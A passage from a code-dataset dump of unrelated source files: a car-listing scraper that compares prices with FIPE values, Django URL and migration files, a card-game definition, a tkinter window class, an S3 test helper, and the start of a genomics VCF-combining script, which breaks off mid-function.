html_splited = html.split("sc-1fcmfeb-2 juiJqh")
for anuncio in html_splited:
try: #5
soup = BeautifulSoup(anuncio, 'html.parser')
elemento_link = soup.find("a", {"data-lurker-detail":"list_id"}) #4
link = elemento_link.get("href") #6
except:
None
else:
links.append(link) #7
return links
def apro(content, list_=None):
for i in range(len(content)):
text = content[i].text
res = text in list_
if res == True:
return text
return ''
def number(content):
for i in range(len(content)):
text = content[i].text
try:
number = int(text)
return number
except:
text = ''
return ""
def fipe_brand(name_brand, fipe_json):
try:
for n in range(len(fipe_json)):
fipe_brand = fipe_json[n]['fipe_name'].upper()
if name_brand == fipe_brand:
return fipe_json[n]['id']
return 'Not'
except:
return ''
def fipe_carr(name_carr, r_carros):
try:
for n in range(len(r_carros)):
fipe_carr = r_carros[n]['fipe_name'].upper()
#print(fipe_carr)
point_fipe_carr = fipe_carr[-1]
point_name_carr = name_carr[-1]
if point_fipe_carr == '.':
point_fipe_carr = True
else:
point_fipe_carr = False
if point_name_carr == '.':
point_name_carr = True
else:
point_name_carr = False
if point_fipe_carr == True and point_name_carr == False:
fipe_carr = fipe_carr[:-1]
elif point_fipe_carr == False and point_name_carr == True:
name_carr = name_carr[:-1]
if name_carr == fipe_carr:
return r_carros[n]['id']
return 'Not'
except:
return ''
def fipe_model(model_carr, fipe_json):
try:
for n in range(len(fipe_json)):
fipe_carr = fipe_json[n]['name']
#print(model_carr, fipe_carr)
if model_carr == fipe_carr:
return fipe_json[n]['id']
return 'Not'
except:
return ''
def fipe(model_carr, fipe_json):
try:
for n in range(len(fipe_json)):
fipe_carr = fipe_json[n]['name']
#print(model_carr, fipe_carr)
if model_carr == fipe_carr:
return fipe_json[n]['id']
return 'Not'
except:
return ''
def search_data(links):
titles = []
prices = []
models = []
brands = []
yers = []
fuels = []
kms = []
directions = []
changes = []
types = []
poten = []
colors = []
doors = []
link_url = []
dates = []
c = 0
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--headless") #2
chrome_options.add_argument("--no-sandbox") #2
driver = webdriver.Chrome(executable_path='chromedriver', options=chrome_options)
for u in tqdm(links[:10]):
#print(c)
try:
response = driver.get(url=u)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
title = soup.find("h1", {"class":"sc-1q2spfr-0 fSThqK sc-ifAKCX cmFKIN"})
price = soup.find("h2", {"class":"sc-1leoitd-0 cIfjkh sc-ifAKCX cmFKIN"})
date = soup.find("span", {"class":"sc-1oq8jzc-0 jvuXUB sc-ifAKCX fizSrB"})
content = soup.find("div", {"class":"sc-hmzhuo sc-1g2w54p-1 fEpzkb sc-jTzLTM iwtnNi"})
model = content.findAll("a")[0].text
brand = content.findAll("a")[3].text
yer = content.findAll("a")[4].text
fuel = content.findAll("a")[5].text
content2 = soup.findAll("span", {"class":"sc-ifAKCX cmFKIN"})
typy = apro(content2, list_types)
pote = apro(content2, list_poten)
direction = apro(content2, list_directions)
change = apro(content2, list_changes)
color = apro(content2, list_colors)
door = apro(content2, list_doors)
km = number(content2)
except:
titles.append("")
prices.append("")
models.append("")
brands.append("")
yers.append("")
fuels.append("")
types.append("")
poten.append("")
kms.append("")
directions.append("")
changes.append("")
colors.append("")
doors.append("")
link_url.append("")
dates.append("")
else:
titles.append(title.text)
prices.append(price.text)
models.append(model)
brands.append(brand)
yers.append(yer)
fuels.append(fuel)
types.append(typy)
poten.append(pote)
kms.append(km)
directions.append(direction)
changes.append(change)
colors.append(color)
doors.append(door)
link_url.append(u)
dates.append(date.text)
c += 1
matrix = {
'Titulo': titles,
'Preco': prices,
'Modelo': models,
'Fabricante': brands,
'Ano': yers,
'Combustivel': fuels,
'Tipo do Veiculo': types,
'Potencia': poten,
'Km Rodado': kms,
'Direção': directions,
'Cambio': changes,
'Cor': colors,
'Portas': doors,
'Link': link_url,
'Dates': dates
} #8
df = pd.DataFrame(data=matrix) #9
df['fipe'] = np.arange(len(df))
return df
def format_data(df):
for i in range(len(df)):
name_model = df['Modelo'][i]
name_brand = df['Fabricante'][i]
name_model = name_model.replace(name_brand + " ", "")
df['Modelo'][i] = name_model
price_car = df['Preco'][i]
try:
price_car = price_car.split('.')
price_car1 = price_car[0].replace("R$", "")
price_car = price_car1 + price_car[1]
df['Preco'][i] = int(price_car)
except:
df['Preco'][i] = ''
return df
def format_date(df):
for i in range(len(df)):
try:
date_name = df['Dates'][i] # Publicado em 19/06 às 15:57
date_name = date_name.split(" ")
day, month = date_name[2].split("/")
year = datetime.date.today().year
date_name = datetime.datetime(year, int(month), int(day), 0)
df['Dates'][i] = date_name
except:
df['Dates'][i] = ''
regra = datetime.timedelta(days=-1)
date_now = datetime.datetime.now()
date_regra = date_now + regra
date_regra = datetime.datetime(date_regra.year, date_regra.month, date_regra.day)
#print(date_regra)
return df, date_regra
def search_fipe(df):
marcas = requests.get('http://fipeapi.appspot.com/api/1/carros/marcas.json')
r_marcas = marcas.json()
c = 1
for i in tqdm(range(len(df))):
if c >= 57:
c = 0
time.sleep(45)
name_model = df['Modelo'][i]
name_brand = df['Fabricante'][i]
fuel = df['Combustivel'][i]
yer = df['Ano'][i]
name_model_car = yer + ' ' + 'Gasolina'
try:
id_marca = int(fipe_brand(name_brand, r_marcas))
#df2['id_marca'][i] = id_marca
carros = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculos/{id_marca}.json')
r_carros = carros.json()
id_carro = fipe_carr(name_model, r_carros)
#df2['id_carro'][i] = id_carro
modelo = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculo/{id_marca}/{id_carro}.json')
r_modelo = modelo.json()
id_modelo = fipe_model(name_model_car, r_modelo)
#df2['id_modelo'][i] = id_modelo
fipe = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculo/{id_marca}/{id_carro}/{id_modelo}.json')
r_fipe = fipe.json()
df['fipe'][i] = r_fipe['preco']
except:
#df2['id_marca'][i] = ''
#df2['id_carro'][i] = ''
#df2['id_modelo'][i] = ''
df['fipe'][i] = ''
c += 3
return df
def format_fipe(df):
df = df[df['fipe'] != '' ].reset_index(drop=True).fillna('0')
df = df[df['Preco'] != '' ].reset_index(drop=True).fillna('0')
for i in range(len(df)):
price_fipe = df['fipe'][i]
price_fipe = price_fipe.replace("R$ ", "")
price_fipe = price_fipe.replace(".", "")
price_fipe = price_fipe.split(",")
df['fipe'][i] = price_fipe[0]
df['fipe'] = df['fipe'].astype(int)
df['Preco'] = df['Preco'].astype(int)
df = df[df['fipe'] != 0].reset_index(drop=True)
df = df[df['Preco'] != 0].reset_index(drop=True)
return df
def rate(df):
rate = []
for i in range(len(df)):
price_fipe = df['fipe'][i]
price = df['Preco'][i]
if price_fipe > price:
v = ((price_fipe - price)/price_fipe)*100
rate.append(v)
else:
rate.append(0)
df['rate'] = rate
df['rate'] = df['rate'].astype(int)
return df
while True:
links = search_links()
links = search_links()
df = search_data(links)
df = format_data(df.copy())
df, start_date = format_date(df.copy())
df = search_fipe(df.copy())
df = format_fipe(df.copy())
df = rate(df.copy())
data = pd.read_csv('data.csv')
data = pd.concat([data, df], axis=0, ignore_index=True).reset_index(drop=True)
data = data.sort_values(by=['rate'], ascending=False)
data = data.drop_duplicates()
data['Dates'] = pd.to_datetime(data['Dates'])
data = data[(data['Dates'] > start_date)]
data.to_csv('data.csv', index=False) | [
"[email protected]"
] | |
99c959c4de418120bb052622993f89f76210342f | 30d5ea193ca3d73c2dfdf2528f92d5c396f93311 | /instapybc/urls.py | 1b63fe699dbbc02a7e134d8ee088642ea60675c4 | [] | no_license | udayRedI/instapy-backend | 0d696e6272ca0fbcdb63c9e97ea2de916d455a85 | d37ea01a0d37801140ab975639eadfff3dfc1647 | refs/heads/master | 2020-06-26T06:12:01.016554 | 2019-07-30T02:09:32 | 2019-07-30T02:09:32 | 199,556,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """instapybc URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
4efd371132d1a0e5e0beaf8f40c49129ad27cf04 | 02ce998368c08bf5423d3b40165feab05dac4b21 | /server/cards/c0000000017.py | b4e0513ffab372fac0adc1dcc2f27210c5b2c5a1 | [] | no_license | zblcm/python-StoneAsh | 2e0f779a614d063b9a0bb2ef24e8199e9ddfd784 | d2d76a3be2cf93982288de2113a372683fd60336 | refs/heads/master | 2021-07-11T14:57:40.159292 | 2017-10-16T06:14:30 | 2017-10-16T06:14:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | from const import *
from buff import *
def init(self, mode = True):
self.name = "水元素"
self.description = "冻结受到该生物伤害的敌方生物。"
self.typ = CARD_CREATURE
self.subtype = [SUBTYPE_ELEMENT]
self.originalcost = [0, 0, 3, 0, 0, 0] #White Fire Water Tree Light Death
self.orimaxhealth = 4
self.oriattack = 1
self.maxattacktime = 1
if mode:
self.cost = self.originalcost.copy()
self.maxhealth = self.orimaxhealth
self.health = self.maxhealth
self.attack = self.oriattack
self.attacktime = 0
self.needtarget = False
buff = Buff(self.system, "nature_000000_auto", self, self)
self.add_buff(buff)
buff = Buff(self.system, "b0000000017_000", self, self)
self.add_buff(buff)
| [
"[email protected]"
] | |
99ad5aaa350a7200f74fb1bb86a0109da555bcc2 | 01e490a878999d01a3587b0b135ebb4d51cd61a4 | /Window/BaseWindow.py | a5abcc6c9cd2a89fe79ffed24643797b5e014839 | [] | no_license | Cyned/spotu | 977daf45ef83ac6c88be00b5596eb7c966afd17b | 1128e49b99ca54063c519d7f32cf755ffbf27cf6 | refs/heads/master | 2021-08-08T14:13:20.161886 | 2017-11-10T13:10:38 | 2017-11-10T13:10:38 | 110,248,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | from tkinter import Tk
class BaseWindow(Tk):
def __init__(self, master=None):
super().__init__(master)
self._create_variables()
self._conf()
self._create_widgets()
self._create_layouts()
self._create_bindings()
def _create_variables(self):
"""
function to create base variables for the window
"""
self.height =500 if (self.winfo_screenheight() > 1000) else int(self.winfo_screenheight() / 3)
self.width = 500 if (self.winfo_screenwidth() > 1000) else int(self.winfo_screenwidth() / 3)
def _conf(self, *, title='window'):
"""
function to set the base settings of the window
"""
self.protocol('WM_DELETE_WINDOW', self.quit)
self.resizable(False, False)
self.config(bg='#000000')
self.geometry('{}x{}'.format(self.width, self.height))
self.title(title)
def _create_widgets(self):
"""
function to create base widgets for the window
"""
pass
def _create_layouts(self):
"""
function to create base layouts for the window
"""
pass
def _create_bindings(self):
"""
function to create base bindings for the window
"""
pass
| [
"[email protected]"
] | |
6de6c68c8f1fe42715b7566ce5dc23c0173f980c | 0b7b017db9386b74d90ffe541878a756b0ed2976 | /contacts/migrations/0003_remove_contact_birthday.py | 87a7ea0df5de064f8dfd7390951bcae91657931d | [] | no_license | divanov11/contacts-list-with-django-backend | fe95e12bdcc54da535e5c4dc553d377603721d0e | 1ed8bb67ef202d9548e220a6d42203f5cc5dc0ef | refs/heads/master | 2023-02-16T09:33:56.469146 | 2021-01-11T00:07:18 | 2021-01-11T00:07:18 | 328,499,192 | 19 | 2 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # Generated by Django 3.1.4 on 2021-01-10 22:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contacts', '0002_auto_20210108_1420'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='birthday',
),
]
| [
"[email protected]"
] | |
9945a3bfa5b3ebae32c8982e01b0bb9c7954a926 | 6cf266ddd53df60e9361a23bb1924c38185eed9b | /tests/util/s3_util.py | 69d86545a945f64beb62439a9ab5935de5121a7b | [
"Apache-2.0"
] | permissive | jsoft88/Impala | f2d54c1fae7eaa4e783aa1f89c686f6901c1bd15 | 40c01a7f92d2248229e8e45291a1ef43b8c40f48 | refs/heads/cdh5-trunk | 2021-01-15T08:26:30.451304 | 2016-07-12T04:54:21 | 2016-08-02T11:53:20 | 65,306,967 | 0 | 0 | null | 2016-08-09T15:36:42 | 2016-08-09T15:36:41 | null | UTF-8 | Python | false | false | 3,844 | py | # Copyright (c) 2016 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# S3 access utilities
#
# This file uses the boto3 client and provides simple functions to the Impala test suite
# to access Amazon S3.
import boto3
from tests.util.filesystem_base import BaseFilesystem
class S3Client(BaseFilesystem):
@classmethod
def __init__(self, bucket):
self.bucketname = bucket
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(self.bucketname)
self.s3client = boto3.client('s3')
def create_file(self, path, file_data, overwrite=True):
if not overwrite and self.exists(path): return False
self.s3client.put_object(Bucket=self.bucketname, Key=path, Body=file_data)
return True
def make_dir(self, path, permission=None):
# This function is a no-op. S3 is a key-value store and does not have a directory
# structure. We can use a non existant path as though it already exists.
pass
def copy(self, src, dst):
self.s3client.copy_object(Bucket=self.bucketname,
CopySource={'Bucket':self.bucketname, 'Key':src}, Key=dst)
# Since S3 is a key-value store, it does not have a command like 'ls' for a directory
# structured filesystem. It lists everything under a path recursively.
# We have to manipulate its response to get an 'ls' like output.
def ls(self, path):
if not path.endswith('/'):
path += '/'
# Use '/' as a delimiter so that we don't get all keys under a path recursively.
response = self.s3client.list_objects(
Bucket=self.bucketname, Prefix=path, Delimiter='/')
dirs = []
# Non-keys or "directories" will be listed as 'Prefix' under 'CommonPrefixes'.
if 'CommonPrefixes' in response:
dirs = [t['Prefix'] for t in response['CommonPrefixes']]
files = []
# Keys or "files" will be listed as 'Key' under 'Contents'.
if 'Contents' in response:
files = [t['Key'] for t in response['Contents']]
files_and_dirs = []
files_and_dirs.extend([d.split('/')[-2] for d in dirs])
for f in files:
key = f.split("/")[-1]
if not key == '':
files_and_dirs += [key]
return files_and_dirs
def get_all_file_sizes(self, path):
if not path.endswith('/'):
path += '/'
# Use '/' as a delimiter so that we don't get all keys under a path recursively.
response = self.s3client.list_objects(
Bucket=self.bucketname, Prefix=path, Delimiter='/')
if 'Contents' in response:
return [t['Size'] for t in response['Contents']]
return []
def exists(self, path):
response = self.s3client.list_objects(Bucket=self.bucketname,Prefix=path)
return response.get('Contents') is not None
# Helper function which lists keys in a path. Should not be used by the tests directly.
def _list_keys(self, path):
if not self.exists(path):
return False
response = self.s3client.list_objects(Bucket=self.bucketname, Prefix=path)
contents = response.get('Contents')
return [c['Key'] for c in contents]
def delete_file_dir(self, path, recursive=False):
if not self.exists(path):
return True
objects = [{'Key': k} for k in self._list_keys(path)] if recursive else path
self.s3client.delete_objects(Bucket=self.bucketname, Delete={'Objects':objects})
return True
| [
"[email protected]"
] | |
943782f14203b64efe4714db8a392c66edf59048 | 0aad4ba48f2fcdfbfac68db1dcf83592ad014141 | /docker-com/yuanqu/SystemManage/migrations/0001_initial.py | df47f8a2d76d41438e89e890f9506d919032b84b | [] | no_license | cauckfgf/fullstack | d55f5640df4c8c5917f0b23b405422975f347bef | e398797d23b2ef1afd3605f5600a9c4dae8efec8 | refs/heads/master | 2021-07-17T10:49:21.211777 | 2020-04-09T14:16:54 | 2020-04-09T14:16:54 | 123,122,968 | 1 | 3 | null | 2020-03-23T13:55:05 | 2018-02-27T11:59:44 | JavaScript | UTF-8 | Python | false | false | 1,265 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2019-06-25 04:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Config',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('config', models.TextField(blank=True, null=True)),
('appid', models.CharField(default='', max_length=64, verbose_name='\u5fae\u4fe1appid')),
('psw', models.CharField(default='', max_length=64, verbose_name='\u5fae\u4fe1\u516c\u4f17\u53f7\u5bc6\u7801')),
('yuming', models.CharField(default='', max_length=255, verbose_name='\u57df\u540d')),
('color', models.CharField(default='', max_length=255, verbose_name='\u989c\u8272')),
('front', models.CharField(default='', max_length=255, verbose_name='\u5b57\u4f53')),
],
options={
'verbose_name': '\u7cfb\u7edf\u914d\u7f6e',
'verbose_name_plural': '\u7cfb\u7edf\u914d\u7f6e',
},
),
]
| [
"[email protected]"
] | |
41cd82e5658b965f8dc84ee880167cd76fa6546c | 73e9c173e62e0821de2c1db4e5a29b613d4602e3 | /somaticseq/combine_callers.py | 155698472c3837fa9940e9d45b3dc0bcff3c9543 | [
"BSD-2-Clause"
] | permissive | wangdi2014/somaticseq | 388aed215d3ad1a8011ab429fc00a70154d67f4f | 32dcd8c8306041d3d18800f84fd7fdfc64c2a7f9 | refs/heads/master | 2020-03-26T20:49:06.597061 | 2018-08-17T22:04:19 | 2018-08-17T22:04:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,042 | py | #!/usr/bin/env python3
import sys, os, argparse, gzip, re, subprocess
MY_DIR = os.path.dirname(os.path.realpath(__file__))
PRE_DIR = os.path.join(MY_DIR, os.pardir)
sys.path.append( PRE_DIR )
import genomicFileHandler.genomic_file_handlers as genome
import vcfModifier.copy_TextFile as copy_TextFile
import vcfModifier.getUniqueVcfPositions as getUniqueVcfPositions
from vcfModifier.vcfIntersector import *
# Combine individual VCF output into a simple combined VCF file, for single-sample callers
def combineSingle(outdir, ref, bam, inclusion=None, exclusion=None, mutect=None, mutect2=None, varscan=None, vardict=None, lofreq=None, scalpel=None, strelka=None, keep_intermediates=False):
import vcfModifier.splitVcf as splitVcf
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2' :{'snv': None, 'indel': None}, \
'VarScan2' :{'snv': None, 'indel': None}, \
'VarDict' :{'snv': None, 'indel': None}, \
'LoFreq' :{'snv': None, 'indel': None}, \
'Strelka' :{'snv': None, 'indel': None}, }
if mutect:
import vcfModifier.modify_MuTect as mod_mutect
if exclusion:
mutect_ex = bed_exclude(mutect, exclusion, os.sep.join(( outdir, 'snv.mutect1.ex.vcf' )) )
intermediate_files.add(mutect_ex)
else:
mutect_ex = mutect
if inclusion:
mutect_in = bed_include(mutect_ex, inclusion, os.sep.join(( outdir, 'snv.mutect1.in.vcf')) )
intermediate_files.add(mutect_in)
else:
mutect_in = mutect_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, bam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if mutect2:
import vcfModifier.modify_ssMuTect2 as mod_mutect2
if exclusion:
mutect2_ex = bed_exclude(mutect2, exclusion, os.sep.join(( outdir, 'mutect.ex.vcf')) )
intermediate_files.add(mutect2_ex)
else:
mutect2_ex = mutect2
if inclusion:
mutect2_in = bed_include(mutect2_ex, inclusion, os.sep.join(( outdir, 'mutect.in.vcf')) )
intermediate_files.add(mutect2_in)
else:
mutect2_in = mutect2_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect.vcf' ))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect.vcf' ))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan:
import vcfModifier.modify_VarScan2 as mod_varscan2
if exclusion:
varscan_ex = bed_exclude(varscan, exclusion, os.sep.join(( outdir, 'varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan
if inclusion:
varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
snv_temp = os.sep.join(( outdir, 'snv.varscan.temp.vcf' ))
indel_temp = os.sep.join(( outdir, 'indel.varscan.temp.vcf' ))
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf' ))
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
splitVcf.split_into_snv_and_indel(varscan_in, snv_temp, indel_temp)
mod_varscan2.convert(snv_temp, snv_varscan_out)
mod_varscan2.convert(indel_temp, indel_varscan_out)
for file_i in snv_temp, indel_temp, snv_varscan_out, indel_varscan_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_varscan_out)
indel_intermediates.append(indel_varscan_out)
intermediate_vcfs['VarScan2']['snv'] = snv_varscan_out
intermediate_vcfs['VarScan2']['indel'] = indel_varscan_out
if vardict:
import vcfModifier.modify_VarDict as mod_vardict
if exclusion:
vardict_ex = bed_exclude(vardict, exclusion, os.sep.join(( outdir, 'vardict.ex.vcf')) )
intermediate_files.add(vardict_ex)
else:
vardict_ex = vardict
if inclusion:
vardict_in = bed_include(vardict_ex, inclusion, os.sep.join(( outdir, 'vardict.in.vcf')) )
intermediate_files.add(vardict_in)
else:
vardict_in = vardict_ex
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf'))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf'))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf'))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add( file_i )
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if lofreq:
if exclusion:
lofreq_ex = bed_exclude(lofreq, exclusion, os.sep.join(( outdir, 'lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
lofreq_ex = lofreq
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
splitVcf.split_into_snv_and_indel(lofreq_in, snv_lofreq_out, indel_lofreq_out)
for file_i in snv_lofreq_out, indel_lofreq_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
intermediate_vcfs['LoFreq']['snv'] = snv_varscan_out
intermediate_vcfs['LoFreq']['indel'] = indel_varscan_out
if scalpel:
if exclusion:
scalpel_ex = bed_exclude(scalpel, exclusion, os.sep.join(( outdir, 'scalpel.ex.vcf')) )
intermediate_files.add(scalpel_ex)
else:
scalpel_ex = scalpel
if inclusion:
scalpel_in = bed_include(scalpel_ex, inclusion, os.sep.join(( outdir, 'scalpel.in.vcf')) )
intermediate_files.add(scalpel_in)
else:
scalpel_in = scalpel_ex
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka:
import vcfModifier.modify_ssStrelka as mod_strelka
if exclusion:
strelka_ex = bed_exclude(strelka, exclusion, os.sep.join(( outdir, 'strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
strelka_ex = strelka
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out, indel_strelka_out)
for file_i in snv_strelka_out, indel_strelka_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_strelka_out)
indel_intermediates.append(indel_strelka_out)
intermediate_vcfs['Strelka']['snv'] = snv_strelka_out
intermediate_vcfs['Strelka']['indel'] = indel_strelka_out
# Combine SNV/INDEL variant candidates
snv_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.snv.vcf' ))
indel_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.indel.vcf' ))
getUniqueVcfPositions.combine(snv_intermediates, snv_combined)
getUniqueVcfPositions.combine(indel_intermediates, indel_combined)
for file_i in snv_combined, indel_combined:
intermediate_files.add( file_i )
# Sort them:
snv_combined_sorted = os.sep.join(( outdir, 'CombineVariants.snv.vcf' ))
indel_combined_sorted = os.sep.join(( outdir, 'CombineVariants.indel.vcf' ))
vcfsorter(ref, snv_combined, snv_combined_sorted)
vcfsorter(ref, indel_combined, indel_combined_sorted)
if not keep_intermediates:
for file_i in intermediate_files:
subprocess.call( ('rm', '-v', file_i ) )
return snv_combined_sorted, indel_combined_sorted, intermediate_vcfs, intermediate_files
# Combine individual VCF output into a simple combined VCF file, for paired sample callers
def combinePaired(outdir, ref, tbam, nbam, inclusion=None, exclusion=None, mutect=None, indelocator=None, mutect2=None, varscan_snv=None, varscan_indel=None, jsm=None, sniper=None, vardict=None, muse=None, lofreq_snv=None, lofreq_indel=None, scalpel=None, strelka_snv=None, strelka_indel=None, tnscope=None, keep_intermediates=False):
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2':{'snv': None, 'indel': None}, \
'VarDict':{'snv': None, 'indel': None}, \
'TNscope':{'snv': None, 'indel': None}, }
# Modify direct VCF outputs for merging:
if mutect or indelocator:
import vcfModifier.modify_MuTect as mod_mutect
if mutect:
if exclusion:
mutect_ex = bed_exclude(mutect, exclusion, os.sep.join(( outdir, 'snv.mutect1.ex.vcf')) )
intermediate_files.add(mutect_ex)
else:
mutect_ex = mutect
if inclusion:
mutect_in = bed_include(mutect_ex, inclusion, os.sep.join(( outdir, 'snv.mutect1.in.vcf')) )
intermediate_files.add(mutect_in)
else:
mutect_in = mutect_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, tbam, nbam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if indelocator:
if exclusion:
indelocator_ex = bed_exclude(indelocator, exclusion, os.sep.join(( outdir, 'indel.indelocator.ex.vcf')) )
intermediate_files.add(indelocator_ex)
else:
indelocator_ex = indelocator
if inclusion:
indelocator_in = bed_include(indelocator_ex, inclusion, os.sep.join(( outdir, 'indel.indelocator.in.vcf')) )
intermediate_files.add(indelocator_in)
else:
indelocator_in = indelocator_ex
indel_indelocator_out = os.sep.join(( outdir, 'indel.indelocator.vcf'))
mod_mutect.convert(indelocator_in, indel_indelocator_out, tbam, nbam)
intermediate_files.add(indel_indelocator_out)
indel_intermediates.append(indel_indelocator_out)
if mutect2:
import vcfModifier.modify_MuTect2 as mod_mutect2
if exclusion:
mutect2_ex = bed_exclude(mutect2, exclusion, os.sep.join(( outdir, 'mutect.ex.vcf')) )
intermediate_files.add(mutect2_ex)
else:
mutect2_ex = mutect2
if inclusion:
mutect2_in = bed_include(mutect2_ex, inclusion, os.sep.join(( outdir, 'mutect.in.vcf')) )
intermediate_files.add(mutect2_in)
else:
mutect2_in = mutect2_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect.vcf'))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect.vcf'))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out, False)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan_snv or varscan_indel:
import vcfModifier.modify_VarScan2 as mod_varscan2
if varscan_snv:
if exclusion:
varscan_ex = bed_exclude(varscan_snv, exclusion, os.sep.join(( outdir, 'snv.varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan_snv
if inclusion:
varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'snv.varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf'))
mod_varscan2.convert(varscan_in, snv_varscan_out)
intermediate_files.add(snv_varscan_out)
snv_intermediates.append(snv_varscan_out)
if varscan_indel:
if exclusion:
varscan_ex = bed_exclude(varscan_indel, exclusion, os.sep.join(( outdir, 'indel.varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan_indel
if inclusion:
